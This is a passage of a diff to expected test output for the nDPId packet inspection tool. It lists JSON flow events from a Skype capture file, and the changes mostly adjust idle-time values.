+00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969789832,"flow_last_seen":1431969808350,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"78.202.226.115","src_port":50144,"dst_port":29059,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969789832,"flow_last_seen":1431969808350,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"78.202.226.115","src_port":50144,"dst_port":29059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431969689470,"flow_last_seen":1431969716588,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.142","src_port":50075,"dst_port":40003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431969689470,"flow_last_seen":1431969716588,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.142","src_port":50075,"dst_port":40003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.24","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.21","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -1158,9 +1146,11 @@ 00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.37","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969698743,"flow_last_seen":1431969698797,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63321,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969657367,"flow_last_seen":1431969688218,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":50032,"dst_port":40032,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969657367,"flow_last_seen":1431969688218,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":50032,"dst_port":40032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969675950,"flow_last_seen":1431969702405,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55159,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969642247,"flow_last_seen":1431969668794,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65426,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00641{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"finished","flow_packets_processed":472,"flow_first_seen":1431969710853,"flow_last_seen":1431969807279,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":133455,"flow_avg_l4_payload_len":282,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":50108,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00641{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"finished","flow_packets_processed":472,"flow_first_seen":1431969710853,"flow_last_seen":1431969807279,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":133455,"flow_avg_l4_payload_len":282,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":50108,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969712913,"flow_last_seen":1431969712913,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":49485,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1431969712918,"flow_last_seen":1431969747557,"flow_idle_time":120000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":384,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 
00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969723979,"flow_last_seen":1431969750316,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63421,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -1179,78 +1169,78 @@ 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431969657029,"flow_last_seen":1431969777185,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":2510,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1431969656652,"flow_last_seen":1431969807022,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":3012,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":86,"flow_first_seen":1431969719110,"flow_last_seen":1431969765415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15522,"flow_avg_l4_payload_len":180,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50128,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1431969707326,"flow_last_seen":1431969717500,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":347,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":50103,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1431969707326,"flow_last_seen":1431969717500,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":347,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":50103,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":86,"flow_first_seen":1431969719110,"flow_last_seen":1431969765415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15522,"flow_avg_l4_payload_len":180,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50128,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1431969707326,"flow_last_seen":1431969717500,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":347,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":50103,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1431969707326,"flow_last_seen":1431969717500,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":347,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":50103,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969677975,"flow_last_seen":1431969704363,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49360,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969713815,"flow_last_seen":1431969726847,"flow_idle_time":180000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":660,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip6","src_ip":"fe80::c62c:3ff:fe06:49fe","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969722958,"flow_last_seen":1431969740384,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50130,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969722958,"flow_last_seen":1431969740384,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50130,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431969724570,"flow_last_seen":1431969725166,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3849,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50131,"dst_port":13392,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431969724570,"flow_last_seen":1431969725166,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3849,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50131,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969714398,"flow_last_seen":1431969727593,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50112,"dst_port":20274,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969714398,"flow_last_seen":1431969727593,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50112,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969770694,"flow_last_seen":1431969794907,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50135,"dst_port":20274,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969770694,"flow_last_seen":1431969794907,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50135,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431969712931,"flow_last_seen":1431969713736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":111,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50109,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431969712931,"flow_last_seen":1431969713736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":111,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50109,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431969713736,"flow_last_seen":1431969714165,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50110,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431969713736,"flow_last_seen":1431969714165,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50110,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431969774806,"flow_last_seen":1431969776480,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50140,"dst_port":20274,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431969774806,"flow_last_seen":1431969776480,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50140,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969722958,"flow_last_seen":1431969740384,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50130,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
